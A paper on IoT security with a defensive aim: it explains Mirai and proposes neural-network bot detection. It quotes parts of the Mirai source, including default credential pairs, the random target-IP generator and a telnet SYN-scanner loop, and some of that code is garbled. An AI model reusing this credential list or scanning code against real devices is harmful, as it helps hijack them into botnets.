Internet of Insecure Things

Abstract

Internet of Things(IoT) has become an industry buzzword and in simplest terms it refers to integration of devices (or things) with the internet. Regular devices such as cars, electricity bulbs, health monitors, refrigerators and other kitchen appliances, smoke or fire alarms, alarm clocks etc are going smart as they integrate with the internet. As IoT grows in the industry, more devices join the list. These devices are used to collect data and the internet ecosystem is used to store and process this data. Although introduction of IoT has transformed the way humans interact with devices, it has done more harm than good. Internet was created decades before IoT existed and hence was not designed to be equipped with capabilities to support IoT seamlessly. Devices(hardware) on the other hand were also manufactured in isolation and were not designed to support IoT. This sudden and immense surge of integrating device and internet has introduced several concerns around privacy and security of data. A flaw or loophole in the device or firmware, in the internet backend or in the data transmission can compromise privacy and security. Further to the preventive steps there is a need to understand Botnet codes to make our devices more secure along with introducing Machine Learning to make affected Devices identification effective.

Goal of Presentation

Through this paper we will unveil some of the reasons for and the types of security concerns associated with Internet of Things and some recommendations that device manufacturers should keep in mind while manufacturing IoT enabled devices and designing IoT interfaces.

Introduction

Several IoT devices exist in the market place and they are transforming how humans interact with devices and gadgets. Estimated at 10 billion today, IoT devices are expected to be tripled by 2020 as per report from BI Intelligence. The most hyped IoT device is the Amazon Echo -Smart Home that works through its voice assistant Alexa which users can talk to and get weather updates, recipes, music, time, book cabs and more. Wearables such as FitBit devices and GPS tracker bands tracks user’s health and fitness activities and track user’s locations respectively. Radio-frequency identification (RFID) tags are used extensively in vehicle parking systems in offices, malls and buildings. All these systems collect tons of data and transmit this data over the internet to backend systems for processing and drawing analytics. Although these devices make our lives easier, they do cause safety and security issues owing to the type of data they transmit over the net. Amazon Echo has too much personal data based on users’ daily interactions with voice assistant, Fitbit has data about a person’s health, sleep patterns, workout schedules; GPS trackers track exact coordinates of user’s whereabouts and how far they are from home. If any such data about users gets into the hands of the attackers, they can exploit this information. Criminal can plan robbery learning users sleep patterns or knowing their GPS locations. Phishing attacks can be directed at users by understanding their personal data. Such challenges around security, privacy and user safety are making Internet of Things technology insecure and limiting growth of its true potential.

Objectives

Security Concerns

  • Default/Hardcoded credentials – IoT device manufacturing happens pretty much like non IoT device manufacturing. Not much is spent on firmware hence the firmware contains default or hardcoded credentials for it to work with and connect to backend. Software Lifecycle not followed – Due to conventional manufacturing, cost reductions and early time to market, Software Development Life Cycle (SDLC) is not followed while building firmware for IoT devices. This causes several developmental loopholes which can be exploited; the biggest being unsafe human machine interfaces (HMI).
  • Firmware Vulnerabilities – Firmware in the IoT device may be exposed to vulnerabilities and malware. Usually firmware has weak validations and can be easily compromised. Weak validations on the firmware interface can cause issues such as SQL injections, cross side scripting, accessibility to important functions via USBs etc.
  • Universal Plug and Play(UPnP)-Attackers need a method to connect to IoT devices. The easiest way is to gain access to vulnerabilities in the routers. UPnP doesn’t require any sort of authentication from the user. Any application running on a computer can ask the router to forward a portover UPnP, which is why the malware above can abuse UPnP.
  • HeartBleed Bug: -The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. This weakness allows stealing the information protected, under normal conditions, by the SSL/TLS encryption used to secure the Internet. SSL/TLS provides communication security and privacy over the Internet for applications such as web, email, instant messaging (IM) and some virtual private networks (VPNs).

Per a report by shodan.io[4] around 130000 devices alone in top 10 countries are prone to heartbleed

DDoS Attack demystified

  • Mirai Botnet - Distributed Denial of Service – One of the most dreaded security attacks in IoT history is due to default credentials, Mirai Botnet, in which nearly a million users across Europe and North America were thrown off the internet. This attack was executed by flooding the target machine with superfluous requests from spoofed IPs by creating a bot network of interconnected devices like printers, cameras, gateways etc, all of which were infected by the malware Mirai. These devices were remotely accessible by easily guessable default credentials. The exploit code was remotely injected into the IoT devices through an open port 7547 which is typically used by Internet Service Providers (ISP) to remotely manage and control in case of outages.

Mirai botnet was created by using a brute force technique of attempting to connect with a series of combination of 62 default credentials and since there was no cap on the number of attempts, all such devices with default or weak credential fell prey to the attack.

Going through the code shared by the user jgamblin [5] , the following code snippets included

The list of passwords like :-

UserName / Password
root / xc3511
root / vizxv
root / admin
admin / admin
root / 888888

IP addresses being targeted are run using the below function. While the loops go through the entire IP List, the attackers are careful about not targeting certain secure IPs. One notable thing is that IP address of two Private companies namely General Electric and Hewlett Packard were blacklisted from the attack

static ipv4_t get_random_ip(void)

{

uint32_t tmp;

uint8_t o1, o2, o3, o4;

m ;. do

{

tmp = rand_next();

o1 = tmp & 0xff;

o2 = (tmp > 8) & 0xff;

o3 = (tmp > 16) & 0xff;

o4 = (tmp > 24) & 0xff;

}

while (o1 == 127 || // 127.0.0.0/8 - Loopback

(o1 == 0) || // 0.0.0.0/8 - Invalid address space

(o1 == 3) || // 3.0.0.0/8 - General Electric Company

(o1 == 15 || o1 == 16) || // 15.0.0.0/7 - Hewlett-Packard Company

(o1 == 56) || // 56.0.0.0/8 - US Postal Service

(o1 == 10) || // 10.0.0.0/8 - Internal network

(o1 == 192 & o2 == 168) || // 192.168.0.0/16 - Internal network

(o1 == 172 & o2 >= 16 & o2 < 32) || // 172.16.0.0/14 - Internal network

(o1 == 100 & o2 >= 64 & o2 < 127) || // 100.64.0.0/10 - IANA NAT reserved

(o1 == 169 & o2 > 254) || // 169.254.0.0/16 - IANA NAT reserved

(o1 == 198 & o2 >= 18 & o2 < 20) || // 198.18.0.0/15 - IANA Special use

(o1 >= 224) || // 224.*.*.*+ - Multicast

(o1 == 6 || o1 == 7 || o1 == 11 || o1 == 21 || o1 == 22 || o1 == 26 || o1 == 28 || o1 == 29 || o1 == 30 || o1 == 33 || o1 == 55 || o1 == 214 || o1 == 215) // Department of Defense

);

return INET_ADDR(o1,o2,o3,o4);

}

Command and Control(CNC)

This is the command and control (CNC) logic that a server(s) applies to the botnet. It is all Go source code that defines various APIs and command functions to execute per device “bot”.

The entire code runs for each bot managed by the Admin and addresses the bot to start diverting traffic

// Main logic loop

while (TRUE)

{

……….

// Spew out SYN to try and get a response

if (fake_time != last_spew)

{

last_spew = fake_time;

for (i = 0; i < SCANNER_RAW_PPS; i++)

{

struct sockaddr_inpaddr = {0};

struct iphdr *iph = (struct iphdr *)scanner_rawpkt;

struct tcphdr *tcph = (struct tcphdr *)(iph + 1);

iph->id = rand_next();

iph->saddr = LOCAL_ADDR;

iph->daddr = get_random_ip();

iph->check = 0;

iph->check = checksum_generic((uint16_t *)iph, sizeof (struct iphdr));

if (i % 10 == 0)

{

tcph->dest = htons(2323);

}

else

{

tcph->dest = htons(23);

}

…………………

sendto(rsck, scanner_rawpkt, sizeof (scanner_rawpkt), MSG_NOSIGNAL, (struct sockaddr *)&paddr, sizeof (paddr));

}

……………….

//default port

if (n < sizeof(struct iphdr) + sizeof(struct tcphdr))

continue;

if (iph->daddr != LOCAL_ADDR)

continue;

if (iph->protocol != IPPROTO_TCP)

continue;

if (tcph->source != htons(23) & tcph->source != htons(2323))

continue;

if (tcph->dest != source_port)

continue;

if (!tcph->syn)

continue;

if (!tcph->ack)

continue;

if (tcph->rst)

continue;

if (tcph->fin)

continue;

if (htonl(ntohl(tcph->ack_seq) - 1) != iph->saddr)

continue;

conn = NULL;

for (n = last_avail_conn; n < SCANNER_MAX_CONNS; n++)

{

if (conn_table[n].state == SC_CLOSED)

{

conn = &conn_table[n];

last_avail_conn = n;

break;

}

}

// If there were no slots, then no point reading any more

if (conn == NULL)

break;

conn->dst_addr = iph->saddr;

conn->dst_port = tcph->source;

setup_connection(conn);

#ifdef DEBUG

Using Recurrent Neural Networks to Identify Bots in attacks

Mirai’s attack function enables it to launch HTTP floods and various network (OSI layer 3-4) DDoS attacks. When attacking HTTP floods, Miraibots hidebehind the following default user-agents:

Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36

Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36

Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36

Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36

Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/60

However, there are patterns that can be identified using ML algorithms and Recurrent Neural Networks which can be used to identify any affected bots.

DDoS Datasets

[7]Computer Network Traffic Data- A ~500K CSV with summary of some real network traffic data from the past. The dataset has ~21K rows and covers 10 local workstation IPs over a three month period. Half of these local IPs were compromised at some point during this period and became members of various botnetsEach row consists of four columns:

  1. date: yyyy-mm-dd (from 2006-07-01 through 2006-09-30)
  2. l_ipn: local IP (coded as an integer from 0-9)
  3. r_asn: remote ASN (an integer which identifies the remote ISP)
  4. f: flows (count of connnections for that day)

Reports of "odd" activity or suspicions about a machine's behavior triggered investigations on the following days (although the machine might have been compromised earlier) This data can be used as the predictor variable

  1. Date : IP
  2. 08-24 : 1
  3. 09-04 : 5
  4. 09-18 : 4
  5. 09-26 : 3 6

These patterns could be well defined using RNN Algorithm since every botnet attack is designed as a pattern where these patterns in traffic can be used as features.

[8] Intrusion detection evaluation dataset : Real traces are analyzed to create profiles for agents that generate real traffic for HTTP, SMTP, SSH, IMAP, POP3, and FTP. In this regard, a set of guidelines is established to outline valid datasets, which set the basis for generating profiles. The dataset has been analyzed to create profiles for agents that generate real traffic for HTTP, SMTP, SSH, IMAP, POP3, and FTP.

  • Feature Extraction

[8] Characterization of Tor Traffic using Time based Features :- CICFlowMeter generates bidirectional flows, where the first packet determines the forward (source to destination) and backward (destination to source) directions, hence the 83 statistical features such as Duration, Number of packets, Number of bytes, Length of packets, etc are also calculated separately in the forward and reverse direction. The output of the application is the CSV format file that have six columns as label for each flow namely FlowID, SourceIP, DestinationIP, SourcePort, DestinationPort, and Protocol with more than 80 netowkr traffic features. Note that TCP flows are usually terminated upon connection teardown (by FIN packet) while UDP flows are terminated by a flow timeout. The flow timeout value can be assigned arbitrarily by the individual scheme e.g., 600 seconds for both TCP and UDP.

Recommendations

[3] To remove the Mirai malware from an infected IoT device, users and administrators should take the following actions:

  • Disconnect device from the network.
  • While disconnected from the network and Internet, perform a reboot. Because Mirai malware exists in dynamic memory, rebooting the device clears the malware[6]
  • Ensure that the password for accessing the device has been changed from the default password to a strong password. See US-CERT TipChoosing and Protecting Passwordsfor more information.
  • You should reconnect to the network only after rebooting and changing the password. If you reconnect before changing the password, the device could be quickly reinfected with the Mirai malware.

Preventive Steps

To prevent a malware infection on an IoT device, users and administrators should take following precautions:

  • Ensure all default passwords are changed to strong passwords. Default usernames and passwords for most devices can easily be found on the Internet, making devices with default passwords extremely vulnerable.
  • Update IoT devices with security patches as soon as patches become available.
  • Disable Universal Plug and Play (UPnP) on routers unless absolutely necessary. [1]
  • Consumers should be aware of the capabilities of the devices and appliances installed in their homes and businesses.
  • Monitor Internet Protocol (IP) port 2323/TCP and port 23/TCP for attempts to gain unauthorized control over IoT devices using the network terminal (Telnet) protocol. [2]
  • And more…

Key Takeaways

  • Emphasize security from day one
  • Lifecycle, future-proofing, updates
  • Access control and device authentication
  • Know your enemy
  • Prepare for security breaches

References & Appendix

  • [1] Federal Bureau of Investigation Public Service Announcement: Internet of Things Poses Opportunities for Cyber Crime
  • [2] SANS ISC InfoSec Forums: What is happening on 2323/TCP?
  • [3]
  • [4]
  • [5]
  • [6].
  • [7]

Author Biography

Tanvi Dharmarha is working with Adobe Systems as Quality Engineering Manager and has over 10 years of experience in the software industry. She has several paper publications to her credit. She holds an engineering degree in Information Technology from GGS Indraprastha University and is also a certified Stanford Advanced Project Manager.

Varun Agarwal is working with Adobe systems as a software Engineer and has an experience of over 3 years. He has worked on multiple technologies and products through tenure and has special interest in field of Security Testing.

THANK YOU!